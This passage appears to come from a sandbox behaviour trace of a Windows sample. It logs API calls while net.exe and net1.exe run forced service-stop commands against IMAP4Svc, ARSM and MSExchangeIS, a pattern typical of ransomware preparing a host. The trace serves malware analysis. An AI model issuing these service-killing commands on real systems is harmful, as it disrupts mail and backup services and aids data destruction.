ByteCount=0x10, Buffer=0x30f738 | out: Buffer=0x30f738*=0x561c60) returned 0x0 [0213.210] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x30f738 | out: Buffer=0x30f738*=0x561c78) returned 0x0 [0213.210] _fileno (_File=0x74eb2900) returned -2 [0213.210] _setmode (_FileHandle=-2, _Mode=16384) returned -1 [0213.210] _wcsicmp (_String1="accounts", _String2="stop") returned -18 [0213.211] _wcsicmp (_String1="computer", _String2="stop") returned -16 [0213.211] _wcsicmp (_String1="config", _String2="stop") returned -16 [0213.211] _wcsicmp (_String1="continue", _String2="stop") returned -16 [0213.211] _wcsicmp (_String1="cont", _String2="stop") returned -16 [0213.211] _wcsicmp (_String1="file", _String2="stop") returned -13 [0213.211] _wcsicmp (_String1="files", _String2="stop") returned -13 [0213.211] _wcsicmp (_String1="group", _String2="stop") returned -12 [0213.211] _wcsicmp (_String1="groups", _String2="stop") returned -12 [0213.211] _wcsicmp (_String1="help", _String2="stop") returned -11 [0213.211] _wcsicmp (_String1="helpmsg", _String2="stop") returned -11 [0213.211] _wcsicmp (_String1="localgroup", _String2="stop") returned -7 [0213.211] _wcsicmp (_String1="pause", _String2="stop") returned -3 [0213.211] _wcsicmp (_String1="session", _String2="stop") returned -15 [0213.211] _wcsicmp (_String1="sessions", _String2="stop") returned -15 [0213.211] _wcsicmp (_String1="sess", _String2="stop") returned -15 [0213.211] _wcsicmp (_String1="share", _String2="stop") returned -12 [0213.211] _wcsicmp (_String1="start", _String2="stop") returned -14 [0213.211] _wcsicmp (_String1="stats", _String2="stop") returned -14 [0213.211] _wcsicmp (_String1="statistics", _String2="stop") returned -14 [0213.211] _wcsicmp (_String1="stop", _String2="stop") returned 0 [0213.211] _wcsicmp (_String1="accounts", _String2="IMAP4Svc") returned -8 [0213.211] _wcsicmp (_String1="computer", _String2="IMAP4Svc") returned -6 [0213.211] _wcsicmp (_String1="config", _String2="IMAP4Svc") returned -6 [0213.211] _wcsicmp (_String1="continue", _String2="IMAP4Svc") returned -6 [0213.211] _wcsicmp (_String1="cont", _String2="IMAP4Svc") returned -6 [0213.211] _wcsicmp (_String1="file", _String2="IMAP4Svc") returned -3 [0213.211] _wcsicmp (_String1="files", _String2="IMAP4Svc") returned -3 [0213.211] _wcsicmp (_String1="group", _String2="IMAP4Svc") returned -2 [0213.211] _wcsicmp (_String1="groups", _String2="IMAP4Svc") returned -2 [0213.211] _wcsicmp (_String1="help", _String2="IMAP4Svc") returned -1 [0213.211] _wcsicmp (_String1="helpmsg", _String2="IMAP4Svc") returned -1 [0213.211] _wcsicmp (_String1="localgroup", _String2="IMAP4Svc") returned 3 [0213.211] _wcsicmp (_String1="pause", _String2="IMAP4Svc") returned 7 [0213.211] _wcsicmp (_String1="session", _String2="IMAP4Svc") returned 10 [0213.211] _wcsicmp (_String1="sessions", _String2="IMAP4Svc") returned 10 [0213.211] _wcsicmp (_String1="sess", _String2="IMAP4Svc") returned 10 [0213.211] _wcsicmp (_String1="share", _String2="IMAP4Svc") returned 10 [0213.212] _wcsicmp (_String1="start", _String2="IMAP4Svc") returned 10 [0213.212] _wcsicmp (_String1="stats", _String2="IMAP4Svc") returned 10 [0213.212] _wcsicmp (_String1="statistics", _String2="IMAP4Svc") returned 10 [0213.212] _wcsicmp (_String1="stop", _String2="IMAP4Svc") returned 10 [0213.212] _wcsicmp (_String1="time", _String2="IMAP4Svc") returned 11 [0213.212] _wcsicmp (_String1="user", _String2="IMAP4Svc") returned 12 [0213.212] _wcsicmp (_String1="users", _String2="IMAP4Svc") returned 12 [0213.212] _wcsicmp (_String1="msg", _String2="IMAP4Svc") returned 4 [0213.212] _wcsicmp (_String1="messenger", _String2="IMAP4Svc") returned 4 [0213.212] _wcsicmp (_String1="receiver", _String2="IMAP4Svc") returned 9 [0213.212] _wcsicmp (_String1="rcv", _String2="IMAP4Svc") returned 9 [0213.212] _wcsicmp (_String1="netpopup", _String2="IMAP4Svc") returned 5 [0213.212] _wcsicmp (_String1="redirector", _String2="IMAP4Svc") returned 9 [0213.212] _wcsicmp (_String1="redir", _String2="IMAP4Svc") returned 9 [0213.212] _wcsicmp (_String1="rdr", _String2="IMAP4Svc") returned 9 [0213.212] _wcsicmp (_String1="workstation", _String2="IMAP4Svc") returned 14 [0213.212] _wcsicmp (_String1="work", _String2="IMAP4Svc") returned 14 [0213.212] _wcsicmp (_String1="wksta", _String2="IMAP4Svc") returned 14 [0213.212] _wcsicmp (_String1="prdr", _String2="IMAP4Svc") returned 7 [0213.212] _wcsicmp (_String1="devrdr", _String2="IMAP4Svc") returned -5 [0213.212] _wcsicmp (_String1="lanmanworkstation", _String2="IMAP4Svc") returned 3 [0213.212] _wcsicmp (_String1="server", _String2="IMAP4Svc") returned 10 [0213.212] _wcsicmp (_String1="svr", _String2="IMAP4Svc") returned 10 [0213.212] _wcsicmp (_String1="srv", _String2="IMAP4Svc") returned 10 [0213.212] _wcsicmp (_String1="lanmanserver", _String2="IMAP4Svc") returned 3 [0213.212] _wcsicmp (_String1="alerter", _String2="IMAP4Svc") returned -8 [0213.212] _wcsicmp (_String1="netlogon", _String2="IMAP4Svc") returned 5 [0213.212] _wcsupr (in: _String="IMAP4Svc" | out: _String="IMAP4SVC") returned="IMAP4SVC" [0213.212] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x80000000) returned 0x5654b8 [0213.215] GetServiceKeyNameW (in: hSCManager=0x5654b8, lpDisplayName="IMAP4SVC", lpServiceName=0x74aaf0, lpcchBuffer=0x30f6d4 | out: lpServiceName="", lpcchBuffer=0x30f6d4) returned 0 [0213.216] _wcsicmp (_String1="msg", _String2="IMAP4SVC") returned 4 [0213.216] _wcsicmp (_String1="messenger", _String2="IMAP4SVC") returned 4 [0213.216] _wcsicmp (_String1="receiver", _String2="IMAP4SVC") returned 9 [0213.216] _wcsicmp (_String1="rcv", _String2="IMAP4SVC") returned 9 [0213.216] _wcsicmp (_String1="redirector", _String2="IMAP4SVC") returned 9 [0213.216] _wcsicmp (_String1="redir", _String2="IMAP4SVC") returned 9 [0213.216] _wcsicmp (_String1="rdr", _String2="IMAP4SVC") returned 9 [0213.216] _wcsicmp (_String1="workstation", _String2="IMAP4SVC") returned 14 [0213.216] _wcsicmp (_String1="work", _String2="IMAP4SVC") returned 14 [0213.216] _wcsicmp (_String1="wksta", _String2="IMAP4SVC") returned 14 [0213.216] _wcsicmp (_String1="prdr", _String2="IMAP4SVC") returned 7 [0213.216] _wcsicmp (_String1="devrdr", _String2="IMAP4SVC") returned -5 [0213.216] _wcsicmp (_String1="lanmanworkstation", _String2="IMAP4SVC") returned 3 [0213.216] _wcsicmp (_String1="server", _String2="IMAP4SVC") returned 10 [0213.216] _wcsicmp (_String1="svr", _String2="IMAP4SVC") returned 10 [0213.216] _wcsicmp (_String1="srv", _String2="IMAP4SVC") returned 10 [0213.216] _wcsicmp (_String1="lanmanserver", _String2="IMAP4SVC") returned 3 [0213.216] _wcsicmp (_String1="alerter", _String2="IMAP4SVC") returned -8 [0213.216] _wcsicmp (_String1="netlogon", _String2="IMAP4SVC") returned 5 [0213.216] NetServiceControl (in: servername=0x0, service="IMAP4SVC", opcode=0x0, arg=0x0, bufptr=0x30f6d0 | out: bufptr=0x30f6d0) returned 0x889 [0213.217] wcscpy_s (in: _Destination=0x74a4e8, _SizeInWords=0x104, _Source="NETMSG" | out: _Destination="NETMSG") returned 0x0 [0213.217] LoadLibraryW (lpLibFileName="NETMSG") returned 0x74a80000 [0213.218] FormatMessageW (in: dwFlags=0x2a00, lpSource=0x74a80000, dwMessageId=0x889, dwLanguageId=0x0, lpBuffer=0x74b338, nSize=0x800, Arguments=0x749dd8 | out: lpBuffer="The service name is invalid.\r\n") returned 0x1e [0213.219] GetFileType (hFile=0x26c) returned 0x3 [0213.219] LocalAlloc (uFlags=0x0, uBytes=0x3c) returned 0x563fe8 [0213.219] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="The service name is invalid.\r\n", cchWideChar=30, lpMultiByteStr=0x563fe8, cbMultiByte=60, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="The service name is invalid.\r\n", lpUsedDefaultChar=0x0) returned 30 [0213.219] WriteFile (in: hFile=0x26c, lpBuffer=0x563fe8, nNumberOfBytesToWrite=0x1e, lpNumberOfBytesWritten=0x30f610, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x30f610, lpOverlapped=0x0) returned 0 [0213.219] LocalFree (hMem=0x563fe8) returned 0x0 [0213.219] GetFileType (hFile=0x26c) returned 0x3 [0213.219] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x566290 [0213.219] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x566290, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\nV", lpUsedDefaultChar=0x0) returned 2 [0213.219] WriteFile (in: hFile=0x26c, lpBuffer=0x566290, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x30f610, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x30f610, lpOverlapped=0x0) returned 0 [0213.219] LocalFree (hMem=0x566290) returned 0x0 [0213.219] _ultow (in: _Dest=0x889, _Radix=3208768 | out: _Dest=0x889) returned="2185" [0213.220] FormatMessageW (in: dwFlags=0x2800, lpSource=0x74a80000, dwMessageId=0xdba, dwLanguageId=0x0, lpBuffer=0x74b338, nSize=0x800, Arguments=0x749dd8 | out: lpBuffer="More help is available by typing NET HELPMSG 2185.\r\n") returned 0x34 [0213.220] GetFileType (hFile=0x26c) returned 0x3 [0213.220] LocalAlloc (uFlags=0x0, uBytes=0x68) returned 0x566290 [0213.220] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="More help is available by typing NET HELPMSG 2185.\r\n", cchWideChar=52, lpMultiByteStr=0x566290, cbMultiByte=104, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="More help is available by typing NET HELPMSG 2185.\r\n\x04", lpUsedDefaultChar=0x0) returned 52 [0213.220] WriteFile (in: hFile=0x26c, lpBuffer=0x566290, nNumberOfBytesToWrite=0x34, lpNumberOfBytesWritten=0x30f61c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x30f61c, lpOverlapped=0x0) returned 0 [0213.220] LocalFree (hMem=0x566290) returned 0x0 [0213.220] GetFileType (hFile=0x26c) returned 0x3 [0213.220] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x566290 [0213.220] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x566290, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\nV", lpUsedDefaultChar=0x0) returned 2 [0213.220] WriteFile (in: hFile=0x26c, lpBuffer=0x566290, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x30f61c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x30f61c, lpOverlapped=0x0) returned 0 [0213.220] LocalFree (hMem=0x566290) returned 0x0 [0213.220] NetApiBufferFree (Buffer=0x561c60) returned 0x0 [0213.221] NetApiBufferFree (Buffer=0x561c78) returned 0x0 [0213.221] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop IMAP4Svc /y" [0213.221] exit (_Code=2) Process: id = "318" image_name = "net.exe" filename = "c:\\windows\\syswow64\\net.exe" page_root = "0x613df000" os_pid = "0xa80" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0x908" cmd_line = "net stop ARSM /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 491 os_tid = 0xa88 Process: id = "319" image_name = "net1.exe" filename = "c:\\windows\\syswow64\\net1.exe" page_root = "0x21653000" os_pid = "0xa5c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "318" os_parent_pid = "0xa80" cmd_line = "C:\\Windows\\system32\\net1 stop ARSM /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 492 os_tid = 0xa74 [0213.404] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1efd7c | out: lpSystemTimeAsFileTime=0x1efd7c*(dwLowDateTime=0x486342c0, dwHighDateTime=0x1d57a87)) [0213.404] GetCurrentProcessId () returned 0xa5c [0213.404] GetCurrentThreadId () returned 0xa74 [0213.404] GetTickCount () returned 0x116eeb3 [0213.404] QueryPerformanceCounter (in: lpPerformanceCount=0x1efd74 | out: lpPerformanceCount=0x1efd74*=33368861063) returned 1 [0213.404] GetModuleHandleA (lpModuleName=0x0) returned 0x870000 [0213.404] __set_app_type (_Type=0x1) [0213.404] __p__fmode () returned 0x74eb31f4 [0213.404] __p__commode () returned 0x74eb31fc [0213.405] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x87ffe6) returned 0x0 [0213.405] __getmainargs (in: _Argc=0x889064, _Argv=0x88906c, _Env=0x889068, _DoWildCard=0, _StartInfo=0x889024 | out: _Argc=0x889064, _Argv=0x88906c, _Env=0x889068) returned 0 [0213.405] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0213.405] GetConsoleOutputCP () returned 0x1b5 [0213.405] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x889080 | out: lpCPInfo=0x889080) returned 1 [0213.405] SetThreadUILanguage (LangId=0x0) returned 0x409 [0213.408] sprintf_s (in: _DstBuf=0x1efd34, _DstSize=0xc, _Format=".%u" | out: _DstBuf=".437") returned 4 [0213.408] setlocale (category=0, locale=".437") returned="English_United States.437" [0213.410] GetStdHandle (nStdHandle=0xfffffff5) returned 0x264 [0213.410] GetStdHandle (nStdHandle=0xfffffff4) returned 0x26c [0213.410] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop ARSM /y" [0213.410] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x1efb00, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\net1.exe" (normalized: "c:\\windows\\syswow64\\net1.exe")) returned 0x1c [0213.410] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x5c) returned 0x603bf0 [0213.410] _wcsnicmp (_String1="/Y", _String2="/y", _MaxCount=0x2) returned 0 [0213.411] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x1efd04 | out: Buffer=0x1efd04*=0x601c50) returned 0x0 [0213.411] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x1efd04 | out: Buffer=0x1efd04*=0x601c68) returned 0x0 [0213.411] _fileno (_File=0x74eb2900) returned -2 [0213.411] _setmode (_FileHandle=-2, _Mode=16384) returned -1 [0213.411] _wcsicmp (_String1="accounts", _String2="stop") returned -18 [0213.411] _wcsicmp (_String1="computer", _String2="stop") returned -16 [0213.411] _wcsicmp (_String1="config", _String2="stop") returned -16 [0213.411] _wcsicmp (_String1="continue", _String2="stop") returned -16 [0213.411] _wcsicmp (_String1="cont", _String2="stop") returned -16 [0213.411] _wcsicmp (_String1="file", _String2="stop") returned -13 [0213.411] _wcsicmp (_String1="files", _String2="stop") returned -13 [0213.411] _wcsicmp (_String1="group", _String2="stop") returned -12 [0213.411] _wcsicmp (_String1="groups", _String2="stop") returned -12 [0213.411] _wcsicmp (_String1="help", _String2="stop") returned -11 [0213.411] _wcsicmp (_String1="helpmsg", _String2="stop") returned -11 [0213.411] _wcsicmp (_String1="localgroup", _String2="stop") returned -7 [0213.411] _wcsicmp (_String1="pause", _String2="stop") returned -3 [0213.411] _wcsicmp (_String1="session", _String2="stop") returned -15 [0213.411] _wcsicmp (_String1="sessions", _String2="stop") returned -15 [0213.411] _wcsicmp (_String1="sess", _String2="stop") returned -15 [0213.411] _wcsicmp (_String1="share", _String2="stop") returned -12 [0213.411] _wcsicmp (_String1="start", _String2="stop") returned -14 [0213.411] _wcsicmp (_String1="stats", _String2="stop") returned -14 [0213.411] _wcsicmp (_String1="statistics", _String2="stop") returned -14 [0213.411] _wcsicmp (_String1="stop", _String2="stop") returned 0 [0213.411] _wcsicmp (_String1="accounts", _String2="ARSM") returned -15 [0213.411] _wcsicmp (_String1="computer", _String2="ARSM") returned 2 [0213.412] _wcsicmp (_String1="config", _String2="ARSM") returned 2 [0213.412] _wcsicmp (_String1="continue", _String2="ARSM") returned 2 [0213.412] _wcsicmp (_String1="cont", _String2="ARSM") returned 2 [0213.412] _wcsicmp (_String1="file", _String2="ARSM") returned 5 [0213.412] _wcsicmp (_String1="files", _String2="ARSM") returned 5 [0213.412] _wcsicmp (_String1="group", _String2="ARSM") returned 6 [0213.412] _wcsicmp (_String1="groups", _String2="ARSM") returned 6 [0213.412] _wcsicmp (_String1="help", _String2="ARSM") returned 7 [0213.412] _wcsicmp (_String1="helpmsg", _String2="ARSM") returned 7 [0213.412] _wcsicmp (_String1="localgroup", _String2="ARSM") returned 11 [0213.412] _wcsicmp (_String1="pause", _String2="ARSM") returned 15 [0213.412] _wcsicmp (_String1="session", _String2="ARSM") returned 18 [0213.412] _wcsicmp (_String1="sessions", _String2="ARSM") returned 18 [0213.412] _wcsicmp (_String1="sess", _String2="ARSM") returned 18 [0213.412] _wcsicmp (_String1="share", _String2="ARSM") returned 18 [0213.412] _wcsicmp (_String1="start", _String2="ARSM") returned 18 [0213.412] _wcsicmp (_String1="stats", _String2="ARSM") returned 18 [0213.412] _wcsicmp (_String1="statistics", _String2="ARSM") returned 18 [0213.412] _wcsicmp (_String1="stop", _String2="ARSM") returned 18 [0213.412] _wcsicmp (_String1="time", _String2="ARSM") returned 19 [0213.412] _wcsicmp (_String1="user", _String2="ARSM") returned 20 [0213.412] _wcsicmp (_String1="users", _String2="ARSM") returned 20 [0213.412] _wcsicmp (_String1="msg", _String2="ARSM") returned 12 [0213.412] _wcsicmp (_String1="messenger", _String2="ARSM") returned 12 [0213.412] _wcsicmp (_String1="receiver", _String2="ARSM") returned 17 [0213.412] _wcsicmp (_String1="rcv", _String2="ARSM") returned 17 [0213.412] _wcsicmp (_String1="netpopup", _String2="ARSM") returned 13 [0213.412] _wcsicmp (_String1="redirector", _String2="ARSM") returned 17 [0213.412] _wcsicmp (_String1="redir", _String2="ARSM") returned 17 [0213.412] _wcsicmp (_String1="rdr", _String2="ARSM") returned 17 [0213.412] _wcsicmp (_String1="workstation", _String2="ARSM") returned 22 [0213.412] _wcsicmp (_String1="work", _String2="ARSM") returned 22 [0213.412] _wcsicmp (_String1="wksta", _String2="ARSM") returned 22 [0213.412] _wcsicmp (_String1="prdr", _String2="ARSM") returned 15 [0213.412] _wcsicmp (_String1="devrdr", _String2="ARSM") returned 3 [0213.412] _wcsicmp (_String1="lanmanworkstation", _String2="ARSM") returned 11 [0213.412] _wcsicmp (_String1="server", _String2="ARSM") returned 18 [0213.413] _wcsicmp (_String1="svr", _String2="ARSM") returned 18 [0213.413] _wcsicmp (_String1="srv", _String2="ARSM") returned 18 [0213.413] _wcsicmp (_String1="lanmanserver", _String2="ARSM") returned 11 [0213.413] _wcsicmp (_String1="alerter", _String2="ARSM") returned -6 [0213.413] _wcsicmp (_String1="netlogon", _String2="ARSM") returned 13 [0213.413] _wcsupr (in: _String="ARSM" | out: _String="ARSM") returned="ARSM" [0213.413] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x80000000) returned 0x6054a0 [0213.415] GetServiceKeyNameW (in: hSCManager=0x6054a0, lpDisplayName="ARSM", lpServiceName=0x88aaf0, lpcchBuffer=0x1efca0 | out: lpServiceName="", lpcchBuffer=0x1efca0) returned 0 [0213.416] _wcsicmp (_String1="msg", _String2="ARSM") returned 12 [0213.416] _wcsicmp (_String1="messenger", _String2="ARSM") returned 12 [0213.416] _wcsicmp (_String1="receiver", _String2="ARSM") returned 17 [0213.416] _wcsicmp (_String1="rcv", _String2="ARSM") returned 17 [0213.416] _wcsicmp (_String1="redirector", _String2="ARSM") returned 17 [0213.416] _wcsicmp (_String1="redir", _String2="ARSM") returned 17 [0213.416] _wcsicmp (_String1="rdr", _String2="ARSM") returned 17 [0213.416] _wcsicmp (_String1="workstation", _String2="ARSM") returned 22 [0213.416] _wcsicmp (_String1="work", _String2="ARSM") returned 22 [0213.416] _wcsicmp (_String1="wksta", _String2="ARSM") returned 22 [0213.416] _wcsicmp (_String1="prdr", _String2="ARSM") returned 15 [0213.416] _wcsicmp (_String1="devrdr", _String2="ARSM") returned 3 [0213.416] _wcsicmp (_String1="lanmanworkstation", _String2="ARSM") returned 11 [0213.416] _wcsicmp (_String1="server", _String2="ARSM") returned 18 [0213.416] _wcsicmp (_String1="svr", _String2="ARSM") returned 18 [0213.416] _wcsicmp (_String1="srv", _String2="ARSM") returned 18 [0213.416] _wcsicmp (_String1="lanmanserver", _String2="ARSM") returned 11 [0213.416] _wcsicmp (_String1="alerter", _String2="ARSM") returned -6 [0213.416] _wcsicmp (_String1="netlogon", _String2="ARSM") returned 13 [0213.417] NetServiceControl (in: servername=0x0, service="ARSM", opcode=0x0, arg=0x0, bufptr=0x1efc9c | out: bufptr=0x1efc9c) returned 0x889 [0213.417] wcscpy_s (in: _Destination=0x88a4e8, _SizeInWords=0x104, _Source="NETMSG" | out: _Destination="NETMSG") returned 0x0 [0213.417] LoadLibraryW (lpLibFileName="NETMSG") returned 0x74a10000 [0213.418] FormatMessageW (in: dwFlags=0x2a00, lpSource=0x74a10000, dwMessageId=0x889, dwLanguageId=0x0, lpBuffer=0x88b338, nSize=0x800, Arguments=0x889dd8 | out: lpBuffer="The service name is invalid.\r\n") returned 0x1e [0213.419] GetFileType (hFile=0x26c) returned 0x3 [0213.419] LocalAlloc (uFlags=0x0, uBytes=0x3c) returned 0x603fd0 [0213.419] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="The service name is invalid.\r\n", cchWideChar=30, lpMultiByteStr=0x603fd0, cbMultiByte=60, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="The service name is invalid.\r\n", lpUsedDefaultChar=0x0) returned 30 [0213.419] WriteFile (in: hFile=0x26c, lpBuffer=0x603fd0, nNumberOfBytesToWrite=0x1e, lpNumberOfBytesWritten=0x1efbdc, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x1efbdc, lpOverlapped=0x0) returned 0 [0213.419] LocalFree (hMem=0x603fd0) returned 0x0 [0213.419] GetFileType (hFile=0x26c) returned 0x3 [0213.419] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x606278 [0213.419] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x606278, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\n`", lpUsedDefaultChar=0x0) returned 2 [0213.419] WriteFile (in: hFile=0x26c, lpBuffer=0x606278, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x1efbdc, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x1efbdc, lpOverlapped=0x0) returned 0 [0213.419] LocalFree (hMem=0x606278) returned 0x0 [0213.419] _ultow (in: _Dest=0x889, _Radix=2030604 | out: _Dest=0x889) returned="2185" [0213.420] FormatMessageW (in: dwFlags=0x2800, lpSource=0x74a10000, dwMessageId=0xdba, dwLanguageId=0x0, lpBuffer=0x88b338, nSize=0x800, Arguments=0x889dd8 | out: lpBuffer="More help is available by typing NET HELPMSG 2185.\r\n") returned 0x34 [0213.420] GetFileType (hFile=0x26c) returned 0x3 [0213.420] LocalAlloc (uFlags=0x0, uBytes=0x68) returned 0x606278 [0213.420] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="More help is available by typing NET HELPMSG 2185.\r\n", cchWideChar=52, lpMultiByteStr=0x606278, cbMultiByte=104, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="More help is available by typing NET HELPMSG 2185.\r\n\x04", lpUsedDefaultChar=0x0) returned 52 [0213.420] WriteFile (in: hFile=0x26c, lpBuffer=0x606278, nNumberOfBytesToWrite=0x34, lpNumberOfBytesWritten=0x1efbe8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x1efbe8, lpOverlapped=0x0) returned 0 [0213.420] LocalFree (hMem=0x606278) returned 0x0 [0213.420] GetFileType (hFile=0x26c) returned 0x3 [0213.420] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x606278 [0213.420] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x606278, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\n`", lpUsedDefaultChar=0x0) returned 2 [0213.420] WriteFile (in: hFile=0x26c, lpBuffer=0x606278, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x1efbe8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x1efbe8, lpOverlapped=0x0) returned 0 [0213.420] LocalFree (hMem=0x606278) returned 0x0 [0213.421] NetApiBufferFree (Buffer=0x601c50) returned 0x0 [0213.421] NetApiBufferFree (Buffer=0x601c68) returned 0x0 [0213.421] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop ARSM /y" [0213.421] exit (_Code=2) Process: id = "320" image_name = "net.exe" filename = "c:\\windows\\syswow64\\net.exe" page_root = "0x4aee4000" os_pid = "0x768" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0x908" cmd_line = "net stop MSExchangeIS /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 493 os_tid = 0xa38 Process: id = "321" image_name = "net1.exe" filename = "c:\\windows\\syswow64\\net1.exe" page_root = "0x6c949000" os_pid = "0xa6c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "320" os_parent_pid = "0x768" cmd_line = "C:\\Windows\\system32\\net1 stop MSExchangeIS /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 494 os_tid = 0xa84 [0213.569] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1cf78c | out: lpSystemTimeAsFileTime=0x1cf78c*(dwLowDateTime=0x487d71e0, dwHighDateTime=0x1d57a87)) [0213.569] GetCurrentProcessId () returned 0xa6c [0213.569] GetCurrentThreadId () returned 0xa84 [0213.569] GetTickCount () returned 0x116ef5e [0213.569] QueryPerformanceCounter (in: lpPerformanceCount=0x1cf784 | out: lpPerformanceCount=0x1cf784*=33385347309) returned 1 [0213.569] GetModuleHandleA (lpModuleName=0x0) returned 0x210000 [0213.569] __set_app_type (_Type=0x1) [0213.569] __p__fmode () returned 0x74eb31f4 [0213.569] __p__commode () returned 0x74eb31fc [0213.569] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x21ffe6) returned 0x0 [0213.570] __getmainargs (in: _Argc=0x229064, _Argv=0x22906c, _Env=0x229068, _DoWildCard=0, _StartInfo=0x229024 | out: _Argc=0x229064, _Argv=0x22906c, _Env=0x229068) returned 0 